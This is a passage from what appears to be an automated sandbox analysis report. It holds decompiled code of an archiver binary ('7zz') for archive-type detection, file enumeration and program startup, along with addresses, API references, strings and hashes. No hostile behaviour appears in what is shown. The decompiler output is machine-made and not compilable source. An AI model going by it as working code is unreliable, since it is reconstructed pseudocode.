												 *( *(_t667 - 0x28)) = _t660;
												goto L80;
											}
											goto L80;
										}
										goto L68;
									}
									_t437 = E00408053( *(_t667 - 0x48), L"001");
									__eflags = _t437 - _t641;
									if(_t437 != _t641) {
										goto L81;
									}
									goto L66;
								}
								__eflags =  *(_t667 + 0xc) - _t641;
								if( *(_t667 + 0xc) == _t641) {
									L24:
									E00404AD0(_t667 - 0x88, 4);
									 *((intOrPtr*)(_t667 - 0x88)) = 0x47a668;
									 *(_t667 - 0x5c) = _t641;
									 *(_t667 - 0x58) = _t641;
									 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
									 *(_t667 - 4) = 5;
									E0040FA26(_t667 - 0x60, 0x200000);
									_t440 =  *(_t667 + 0x10);
									_t441 =  *((intOrPtr*)( *_t440 + 0x10))(_t440, _t641, _t641, _t641, _t641);
									__eflags = _t441 - _t641;
									if(_t441 == _t641) {
										 *(_t667 + 0xc) = 0x200000;
										_t441 = E0040FA74( *(_t667 + 0x10),  *(_t667 - 0x58), _t667 + 0xc);
										__eflags = _t441 - _t641;
										if(_t441 != _t641) {
											goto L25;
										}
										__eflags =  *(_t667 + 0xc) - _t641;
										if( *(_t667 + 0xc) != _t641) {
											 *(_t667 - 0x14) = _t641;
											 *(_t667 - 0x70) =  *(_t667 - 0x58);
											 *(_t667 - 0x10) = _t641;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											 *(_t667 - 4) = 6;
											E0040FA26(_t667 - 0x18, 0x10000);
											 *(_t667 - 0x20) =  *(_t667 - 0x10);
											E0046CCB0( *(_t667 - 0x10), 0xff, 0x10000);
											_t670 = _t670 + 0xc;
											__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 0x100;
											if( *((intOrPtr*)(_t667 - 0x2c)) < 0x100) {
												_t449 = 0;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													L38:
													_t109 = _t667 + 0xc;
													 *_t109 =  *(_t667 + 0xc) - 1;
													__eflags =  *_t109;
													_t502 = _t641;
													if( *_t109 == 0) {
														L59:
														_t663 = 0;
														__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
														if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
															L63:
															E0040862D();
															_push(_t667 - 0x88);
															L00443F76(_t667 - 0x34);
															 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
															E00407A18( *(_t667 - 0x10));
															 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
															E00407A18( *(_t667 - 0x58));
															 *(_t667 - 4) = 3;
															E00408604(_t667 - 0x88);
															goto L81;
														} else {
															goto L60;
														}
														do {
															L60:
															_t457 =  *((intOrPtr*)( *(_t667 - 0x28) + _t663 * 4));
															__eflags = _t457 - 0xff;
															if(_t457 != 0xff) {
																E00415C6D(_t667 - 0x88, _t457);
															}
															_t663 = _t663 + 1;
															__eflags = _t663 -  *((intOrPtr*)(_t667 - 0x2c));
														} while (_t663 <  *((intOrPtr*)(_t667 - 0x2c)));
														goto L63;
													}
													while(1) {
														__eflags = _t502 -  *(_t667 + 0xc);
														if(__eflags >= 0) {
															goto L46;
														}
														while(1) {
															_t627 =  *(_t667 - 0x20);
															__eflags =  *((char*)(0 + _t627)) - 0xff;
															if( *((char*)(0 + _t627)) != 0xff) {
																break;
															}
															_t502 =  &(_t502[1]);
															__eflags = _t502 -  *(_t667 + 0xc);
															if(_t502 <  *(_t667 + 0xc)) {
																continue;
															}
															break;
														}
														__eflags = _t502 -  *(_t667 + 0xc);
														L46:
														if(__eflags == 0) {
															goto L59;
														}
														_t645 = 0 +  *(_t667 - 0x20);
														__eflags = _t645;
														_t666 =  *_t645 & 0x000000ff;
														do {
															_t462 =  *( *(_t667 - 0x28) + _t666 * 4);
															 *(_t667 - 0x4c) = _t462;
															_t463 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t462 * 4));
															_t582 =  *(_t463 + 0x30);
															__eflags = _t582;
															 *(_t667 - 0x38) = _t582;
															if(_t582 == 0) {
																L55:
																_t645 = _t667 + _t666 - 0x188;
																goto L56;
															}
															__eflags =  &(_t502[_t582]) -  *(_t667 + 0xc) + 1;
															if( &(_t502[_t582]) >  *(_t667 + 0xc) + 1) {
																goto L55;
															}
															_t465 =  *((intOrPtr*)(_t463 + 0x34));
															_t587 = 0;
															__eflags =  *(_t667 - 0x38);
															if( *(_t667 - 0x38) <= 0) {
																L54:
																E00415C6D(_t667 - 0x88,  *(_t667 - 0x4c));
																 *( *(_t667 - 0x28) + _t666 * 4) = 0xff;
																 *_t645 =  *(_t667 + _t666 - 0x188);
																goto L56;
															}
															_t629 =  &(( *(_t667 - 0x70))[_t502]);
															__eflags = _t629;
															 *(_t667 - 0x3c) = _t629;
															while(1) {
																__eflags =  *( *(_t667 - 0x3c)) -  *((intOrPtr*)(_t587 + _t465));
																if( *( *(_t667 - 0x3c)) !=  *((intOrPtr*)(_t587 + _t465))) {
																	goto L55;
																}
																_t587 = _t587 + 1;
																 *(_t667 - 0x3c) =  *(_t667 - 0x3c) + 1;
																__eflags = _t587 -  *(_t667 - 0x38);
																if(_t587 <  *(_t667 - 0x38)) {
																	continue;
																}
																goto L54;
															}
															goto L55;
															L56:
															_t666 =  *_t645 & 0x000000ff;
															__eflags = _t666 - 0xff;
														} while (_t666 != 0xff);
														_t502 =  &(_t502[1]);
														__eflags = _t502 -  *(_t667 + 0xc);
														if(_t502 <  *(_t667 + 0xc)) {
															_t641 = 0;
															__eflags = 0;
															continue;
														}
														_t641 = 0;
														__eflags = 0;
														goto L59;
													}
												} else {
													goto L35;
												}
												do {
													L35:
													_t591 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) +  *( *(_t667 - 0x28) + _t449 * 4) * 4));
													__eflags =  *((intOrPtr*)(_t591 + 0x30)) - 2;
													if( *((intOrPtr*)(_t591 + 0x30)) >= 2) {
														_t594 = 0 +  *(_t667 - 0x20);
														__eflags = _t594;
														 *_t594 = _t449;
														 *((char*)(_t667 + _t449 - 0x188)) =  *_t594;
													}
													_t449 = _t449 + 1;
													__eflags = _t449 -  *((intOrPtr*)(_t667 - 0x2c));
												} while (_t449 <  *((intOrPtr*)(_t667 - 0x2c)));
												goto L38;
											}
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x10));
											 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x58));
											 *(_t667 - 4) = 3;
											E00408604(_t667 - 0x88);
											goto L32;
										}
										_t650 = 1;
										L29:
										 *((intOrPtr*)(_t667 - 0x60)) = 0x47a7ec;
										E00407A18( *(_t667 - 0x58));
										 *(_t667 - 4) = 3;
										E00408604(_t667 - 0x88);
										goto L127;
									}
									L25:
									_t650 = _t441;
									goto L29;
								}
								_t472 = E0040807A(L"exe");
								__eflags = _t472 - _t641;
								if(_t472 != _t641) {
									goto L64;
								}
								goto L24;
							}
							__eflags =  *(_t667 + 0xc) - 1;
							if( *(_t667 + 0xc) != 1) {
								goto L111;
							}
							E00408642(_t667 - 0x34, 1);
							goto L21;
						} else {
							goto L14;
						}
						do {
							L14:
							__eflags = E0041761D( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t495 * 4)), _t667 - 0x48);
							if(__eflags < 0) {
								E00415C6D(_t667 - 0x34, _t495);
							} else {
								 *(_t667 + 0xc) =  *(_t667 + 0xc) + 1;
								 *(_t667 - 0x38) =  *(_t667 + 0xc) << 2;
								E00408767(_t667 - 0x34, __eflags,  *(_t667 + 0xc));
								 *( *(_t667 - 0x38) +  *(_t667 - 0x28)) = _t495;
							}
							_t479 =  *((intOrPtr*)(_t667 + 8));
							_t495 = _t495 + 1;
							__eflags = _t495 -  *((intOrPtr*)(_t479 + 0x10));
						} while (_t495 <  *((intOrPtr*)(_t479 + 0x10)));
						goto L18;
					}
					E00415C6D(_t667 - 0x34,  *(_t667 + 0xc));
					goto L92;
				} else {
					_t607 =  *((intOrPtr*)(_t667 - 0x6c));
					_t484 = _t607 + _t353 * 2 - 2;
					L4:
					L4:
					if( *_t484 == 0x2e) {
						_t486 = _t484 - _t607 >> 1;
					} else {
						goto L5;
					}
					L9:
					__eflags = _t486 - _t641;
					if(_t486 >= _t641) {
						__eflags = _t486 + 1;
						_t489 = E004072C9(_t667 - 0x6c, _t667 - 0x18, _t486 + 1);
						 *(_t667 - 4) = 2;
						E00401E26(_t667 - 0x48, _t489);
						 *(_t667 - 4) = 1;
						E00407A18( *((intOrPtr*)(_t667 - 0x18)));
					}
					goto L11;
					L5:
					if(_t484 == _t607) {
						_t486 = _t484 | 0xffffffff;
						__eflags = _t486;
						goto L9;
					} else {
						_t484 = _t484;
						goto L4;
					}
				}
			}

0x00417bb3
0x00417bb8
0x00417bc0
0x00417bc3
0x00417bc5
0x00417bc8
0x00417bcc
0x00417bd1
0x00417bd4
0x00417bd4
0x00417bd9
0x00417be2
0x00417be5
0x00417bef
0x00417bf2
0x00417bf5
0x00417bf8
0x00417bfb
0x00417c00
0x00417c03
0x00417c09
0x00417c55
0x00417c5a
0x00417c64
0x00417c67
0x00417c6a
0x00417c6e
0x00417c80
0x00417c83
0x00417c85
0x00417c88
0x00417c8b
0x00417cd7
0x00417cd7
0x00417cda
0x00417cf0
0x00417cf0
0x00417cf4
0x00417fba
0x00417fc2
0x00417fc7
0x00417fc9
0x00417fe0
0x00417fe0
0x00417fe3
0x00417fe6
0x00417ff6
0x00417ffa
0x00417fff
0x00418002
0x0041800c
0x0041800f
0x00418011
0x00418028
0x0041802b
0x0041802d
0x00418034
0x004183d8
0x004183db
0x004183df
0x004183e7
0x004183ef
0x004183f5
0x00417e21
0x00417e27
0x00417e2f
0x00417e2f
0x0041801c
0x0041801f
0x00418024
0x00418026
0x0041803f
0x00418043
0x004180d3
0x004180d6
0x004180da
0x004180e1
0x004180e7
0x004180e7
0x004180eb
0x00418194
0x00418194
0x00418197
0x0041819a
0x00417e00
0x00417e03
0x00417e07
0x00417e0f
0x00417e17
0x00417e20
0x00000000
0x00417e20
0x004181a0
0x004181a3
0x004181a5
0x004181a5
0x004181a8
0x004181aa
0x004181be
0x004181be
0x004181c7
0x004181cb
0x004181d1
0x004181e1
0x004181e6
0x004181e9
0x004181eb
0x004181f3
0x004181f5
0x0041820c
0x0041821b
0x0041821f
0x00418221
0x00418224
0x00418226
0x00418275
0x00418278
0x0041827c
0x0041827e
0x00418283
0x00418283
0x00418286
0x00418289
0x0041828d
0x00418295
0x0041829d
0x004182a3
0x00000000
0x004182a8
0x00418231
0x00418233
0x00418236
0x00418238
0x0041823c
0x00418241
0x00418241
0x00418244
0x00418244
0x00418247
0x004182ae
0x004182b0
0x004182cc
0x004182d0
0x004182d4
0x004182e0
0x004182e4
0x004182e7
0x004182eb
0x004182ed
0x004182f2
0x004182f5
0x004182f7
0x004182f7
0x00418300
0x00418300
0x00418308
0x0041830c
0x00418316
0x00418324
0x00418327
0x0041832a
0x0041838e
0x00418393
0x00418395
0x00418397
0x00418397
0x00418397
0x00418399
0x004183a2
0x004183a6
0x004183aa
0x004183b3
0x004183b7
0x004183bf
0x0041832c
0x00418335
0x0041833e
0x00418342
0x0041834d
0x00418351
0x00418355
0x00418359
0x00418362
0x00418366
0x0041836e
0x00418376
0x0041837e
0x00418383
0x004183c5
0x004183c8
0x004183cc
0x004183ce
0x004183d3
0x004183d3
0x004183d6
0x004183d6
0x004182b2
0x004182b2
0x004182b5
0x004182b9
0x004182bb
0x004182c4
0x004182c4
0x004182bb
0x00000000
0x004182b0
0x00418249
0x0041824c
0x00418250
0x00418252
0x00418257
0x00418257
0x00000000
0x00418252
0x00418208
0x00000000
0x00418208
0x004181ed
0x00000000
0x004181ed
0x004181b3
0x004181b6
0x004181b8
0x0041826e
0x00000000
0x0041826e
0x00000000
0x0041825a
0x0041825a
0x00418260
0x00418260
0x00000000
0x00418269
0x004180f9
0x00418105
0x00418111
0x00418114
0x00418118
0x00418120
0x00418127
0x00418133
0x0041813f
0x00418142
0x00418146
0x0041814b
0x0041814c
0x0041814e
0x00418151
0x00418154
0x00418156
0x00000000
0x00000000
0x0041815b
0x0041815e
0x00418161
0x00418163
0x00418166
0x00418168
0x00418168
0x0041816a
0x0041816d
0x0041816f
0x00418171
0x00418171
0x00418173
0x00418177
0x00418178
0x00418178
0x0041817d
0x0041817f
0x00418181
0x00418183
0x0041818b
0x00418191
0x00418191
0x00418183
0x00000000
0x0041817f
0x00418049
0x00418052
0x00418054
0x00418058
0x0041805c
0x00418060
0x00418064
0x00418068
0x0041806c
0x0041806c
0x0041806e
0x0041806e
0x00418075
0x00418077
0x00000000
0x00000000
0x00418079
0x0041807a
0x0041807d
0x00000000
0x00000000
0x0041807f
0x00418083
0x00000000
0x00000000
0x00418085
0x00418089
0x00000000
0x00000000
0x0041808b
0x0041808d
0x00418090
0x00000000
0x00000000
0x00000000
0x00000000
0x00418092
0x00418092
0x0041809a
0x004180a9
0x004180ae
0x004180b0
0x00000000
0x00000000
0x004180b2
0x004180b3
0x004180b6
0x00000000
0x00000000
0x00000000
0x004180b8
0x004180c0
0x004180c9
0x004180d1
0x00000000
0x004180d1
0x00000000
0x0041806e
0x00000000
0x00418026
0x00417fd3
0x00417fd8
0x00417fda
0x00000000
0x00000000
0x00000000
0x00417fda
0x00417cfa
0x00417cfd
0x00417d14
0x00417d1c
0x00417d21
0x00417d2c
0x00417d2f
0x00417d32
0x00417d3e
0x00417d42
0x00417d47
0x00417d51
0x00417d54
0x00417d56
0x00417d65
0x00417d69
0x00417d6e
0x00417d70
0x00000000
0x00000000
0x00417d72
0x00417d75
0x00417d9d
0x00417da0
0x00417da3
0x00417da6
0x00417db2
0x00417db6
0x00417dc5
0x00417dc8
0x00417dcd
0x00417dd0
0x00417dd7
0x00417e32
0x00417e34
0x00417e37
0x00417e70
0x00417e70
0x00417e70
0x00417e70
0x00417e73
0x00417e75
0x00417f4c
0x00417f4c
0x00417f4e
0x00417f51
0x00417f72
0x00417f75
0x00417f83
0x00417f84
0x00417f91
0x00417f94
0x00417f9c
0x00417f9f
0x00417fa5
0x00417fb0
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f53
0x00417f53
0x00417f56
0x00417f59
0x00417f5e
0x00417f67
0x00417f67
0x00417f6c
0x00417f6d
0x00417f6d
0x00000000
0x00417f53
0x00417e7f
0x00417e7f
0x00417e82
0x00000000
0x00000000
0x00417e87
0x00417e87
0x00417e93
0x00417e97
0x00000000
0x00000000
0x00417e99
0x00417e9a
0x00417e9d
0x00000000
0x00000000
0x00000000
0x00417e9d
0x00417e9f
0x00417ea2
0x00417ea2
0x00000000
0x00000000
0x00417ebb
0x00417ebb
0x00417ebd
0x00417ec0
0x00417ec6
0x00417ecc
0x00417ecf
0x00417ed2
0x00417ed5
0x00417ed7
0x00417eda
0x00417f2e
0x00417f2e
0x00000000
0x00417f2e
0x00417ee2
0x00417ee4
0x00000000
0x00000000
0x00417ee6
0x00417ee9
0x00417eeb
0x00417eee
0x00417f0b
0x00417f14
0x00417f1c
0x00417f2a
0x00000000
0x00417f2a
0x00417ef3
0x00417ef3
0x00417ef5
0x00417ef8
0x00417efd
0x00417f00
0x00000000
0x00000000
0x00417f02
0x00417f03
0x00417f06
0x00417f09
0x00000000
0x00000000
0x00000000
0x00417f09
0x00000000
0x00417f35
0x00417f35
0x00417f38
0x00417f38
0x00417f40
0x00417f41
0x00417f44
0x00417e7d
0x00417e7d
0x00000000
0x00417e7d
0x00417f4a
0x00417f4a
0x00000000
0x00417f4a
0x00000000
0x00000000
0x00000000
0x00417e39
0x00417e39
0x00417e45
0x00417e48
0x00417e4c
0x00417e5d
0x00417e5d
0x00417e61
0x00417e63
0x00417e63
0x00417e6a
0x00417e6b
0x00417e6b
0x00000000
0x00417e39
0x00417ddc
0x00417ddf
0x00417de7
0x00417dea
0x00417df0
0x00417dfb
0x00000000
0x00417dfb
0x00417d79
0x00417d7a
0x00417d7d
0x00417d80
0x00417d86
0x00417d90
0x00000000
0x00417d90
0x00417d58
0x00417d58
0x00000000
0x00417d58
0x00417d07
0x00417d0c
0x00417d0e
0x00000000
0x00000000
0x00000000
0x00417d0e
0x00417cdc
0x00417ce0
0x00000000
0x00000000
0x00417ceb
0x00000000
0x00000000
0x00000000
0x00000000
0x00417c8d
0x00417c8d
0x00417c9f
0x00417ca1
0x00417cc9
0x00417ca3
0x00417cac
0x00417caf
0x00417cb5
0x00417cc0
0x00417cc0
0x00417cce
0x00417cd1
0x00417cd2
0x00417cd2
0x00000000
0x00417c8d
0x00417c76
0x00000000
0x00417c0b
0x00417c0b
0x00417c0e
0x00000000
0x00417c12
0x00417c16
0x00417c22
0x00000000
0x00000000
0x00000000
0x00417c29
0x00417c29
0x00417c2b
0x00417c2d
0x00417c36
0x00417c3f
0x00417c43
0x00417c4b
0x00417c4f
0x00417c54
0x00000000
0x00417c18
0x00417c1a
0x00417c26
0x00417c26
0x00000000
0x00417c1c
0x00417c1d
0x00000000
0x00417c1d
0x00417c1a

APIs

__EH_prolog.LIBCMT ref: 00417BB3

Strings

a, xrefs: 00418058
exe, xrefs: 00417D02
!, xrefs: 00418060
rar, xrefs: 00418095
tI, xrefs: 0041832C
R, xrefs: 00418054
c[@, xrefs: 00417D27, 00417F8C, 00417FE6, 0041802D, 004180DA
001, xrefs: 00417FCE
iso, xrefs: 004180F1
000, xrefs: 00417FBD
r, xrefs: 0041805C
Unknown error, xrefs: 004182F7, 004182FC

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: !$000$001$R$Unknown error$a$c[@$exe$iso$r$rar$tI
API String ID: 3519838083-4101332242
Opcode ID: 206f97cf47abe644efdfadb335eb1742583df4d89bbfbb1961c776fc5318bc45
Instruction ID: ff5ff08527ddfe2bc4deabd4e0b21c70904ab096e5b089e9ffbf148357062f4e
Opcode Fuzzy Hash: 206f97cf47abe644efdfadb335eb1742583df4d89bbfbb1961c776fc5318bc45
Instruction Fuzzy Hash: 7552C030D04248DFCF15DFA5C8809EEBBB5AF48314F24846EE445AB391DB389A86CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B174 Relevance: 7.6, APIs: 5, Instructions: 88
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040B174(void** __ecx, void* __edi, void* __eflags) {
				signed int _t34;
				signed int _t36;
				void* _t47;
				void* _t53;
				void** _t77;
				void* _t79;
				intOrPtr _t86;

				E0046B890(E00473D64, _t79);
				_t77 = __ecx;
				_t34 = E0040B154(__ecx);
				if(_t34 == 0) {
					L11:
					 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
					return _t34;
				}
				_t86 =  *0x490a7c; // 0x1
				if(_t86 == 0) {
					E00403532(_t79 - 0x24,  *(_t79 + 8));
					 *(_t79 - 4) = 1;
					_t36 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t36 + 1);
					 *_t77 = FindFirstFileA( *(E0040822F(_t79 - 0x30)), _t79 - 0x170);
					E00407A18( *((intOrPtr*)(_t79 - 0x30)));
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					E00407A18( *((intOrPtr*)(_t79 - 0x24)));
					__eflags =  *_t77 - 0xffffffff;
					if(__eflags != 0) {
						E0040B2EA(_t79 - 0x170,  *((intOrPtr*)(_t79 + 0xc)), __eflags);
					}
					L10:
					_t34 = 0 |  *_t77 != 0xffffffff;
					goto L11;
				}
				_t47 = FindFirstFileW( *(_t79 + 8), _t79 - 0x3c0); // executed
				 *_t77 = _t47;
				if(_t47 != 0xffffffff) {
					L6:
					_t90 =  *_t77 - 0xffffffff;
					if( *_t77 != 0xffffffff) {
						E0040B28B(_t79 - 0x3c0,  *((intOrPtr*)(_t79 + 0xc)), _t90);
					}
					goto L10;
				}
				 *(_t79 - 0x18) = 0;
				 *((intOrPtr*)(_t79 - 0x14)) = 0;
				 *((intOrPtr*)(_t79 - 0x10)) = 0;
				E00401E9A(_t79 - 0x18, 3);
				 *(_t79 - 4) = 0;
				if(E0040B863(_t79 - 0x18) != 0) {
					_t53 = FindFirstFileW( *(_t79 - 0x18), _t79 - 0x3c0); // executed
					 *_t77 = _t53;
				}
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				E00407A18( *(_t79 - 0x18));
				goto L6;
			}

0x0040b179
0x0040b185
0x0040b187
0x0040b18e
0x0040b27c
0x0040b280
0x0040b288
0x0040b288
0x0040b197
0x0040b19d
0x0040b215
0x0040b21a
0x0040b221
0x0040b229
0x0040b232
0x0040b24b
0x0040b24d
0x0040b255
0x0040b259
0x0040b25e
0x0040b263
0x0040b26e
0x0040b26e
0x0040b273
0x0040b279
0x00000000
0x0040b279
0x0040b1b0
0x0040b1b5
0x0040b1b7
0x0040b1f9
0x0040b1f9
0x0040b1fd
0x0040b208
0x0040b208
0x00000000
0x0040b1fd
0x0040b1be
0x0040b1c1
0x0040b1c4
0x0040b1c7
0x0040b1d2
0x0040b1dc
0x0040b1e8
0x0040b1ea
0x0040b1ea
0x0040b1ef
0x0040b1f3
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040B179

Part of subcall function 0040B154: FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F

FindFirstFileW.KERNELBASE(000000FF,?,?), ref: 0040B1B0
FindFirstFileW.KERNELBASE(00000002,?,00000003), ref: 0040B1E8
AreFileApisANSI.KERNEL32(000000FF), ref: 0040B221
FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040B242

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileFind$First$ApisCloseH_prolog
String ID:
API String ID: 4121580741-0
Opcode ID: f763ac5f82e435b8d6b012c7509676add0fd9d54bd021928ef73c32a673d885f
Instruction ID: fbd6ce0b626e89321ef8dbff40679b25df86b8bcd2a774ab2a160b2ca2317645
Opcode Fuzzy Hash: f763ac5f82e435b8d6b012c7509676add0fd9d54bd021928ef73c32a673d885f
Instruction Fuzzy Hash: F0316B3180020ADBCB15EFA4D8459EDBB78FF04324F20466EE461B72E1DB395A85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0046CF4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x47c8a0);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x4936fc = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x4936f8 = _t25;
				 *0x4936f4 = _t25 << 8;
				 *0x4936f0 = _t8 >> 0x10;
				if(E0046EA66(_t25 << 8, 1) == 0) {
					E0046D061(0x1c);
				}
				if(E0046E31C() == 0) {
					E0046D061(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E0046FCD7(); // executed
				 *0x49659c = GetCommandLineA();
				 *0x493670 = E00470AD6();
				E00470889();
				E004707D0();
				E0046E6C8();
				_t18 =  *0x49370c; // 0x22012c0
				 *0x493710 = _t18;
				_push(_t18);
				_push( *0x493704);
				_push( *0x493700); // executed
				_t19 = E00405C72(_v8); // executed
				_v32 = _t19;
				E0046E6F5(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E00470658(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}

0x0046cf4c
0x0046cf4f
0x0046cf51
0x0046cf56
0x0046cf61
0x0046cf62
0x0046cf6e
0x0046cf6f
0x0046cf72
0x0046cf7c
0x0046cf84
0x0046cf8a
0x0046cf95
0x0046cf9e
0x0046cfad
0x0046cfb1
0x0046cfb6
0x0046cfbe
0x0046cfc2
0x0046cfc7
0x0046cfc8
0x0046cfcc
0x0046cfd7
0x0046cfe1
0x0046cfe6
0x0046cfeb
0x0046cff0
0x0046cff5
0x0046cffa
0x0046cfff
0x0046d000
0x0046d006
0x0046d00c
0x0046d014
0x0046d018
0x0046d024
0x0046d030

APIs

GetVersion.KERNEL32 ref: 0046CF72

Part of subcall function 0046EA66: HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
Part of subcall function 0046EA66: HeapDestroy.KERNEL32 ref: 0046EAB6

GetCommandLineA.KERNEL32 ref: 0046CFD1

Part of subcall function 0046D061: ExitProcess.KERNEL32 ref: 0046D07E

Strings

h8h, xrefs: 0046CFD7

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitLineProcessVersion
String ID: h8h
API String ID: 1387771204-3983742491
Opcode ID: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
Instruction ID: 870f0fd66317059e0ff95abc7fdc162525e316738eefe618a921cd101cb68cd4
Opcode Fuzzy Hash: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
Instruction Fuzzy Hash: EF2105F0940201AFE718BFA2DC42B7A7BA4EB26715F00413FF404A63A1EB3C49008B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5F4 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C5F4() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}

0x0040c5fe
0x0040c608

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,004012EC,00000000,00000000,00490AB0), ref: 0040C5FE

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
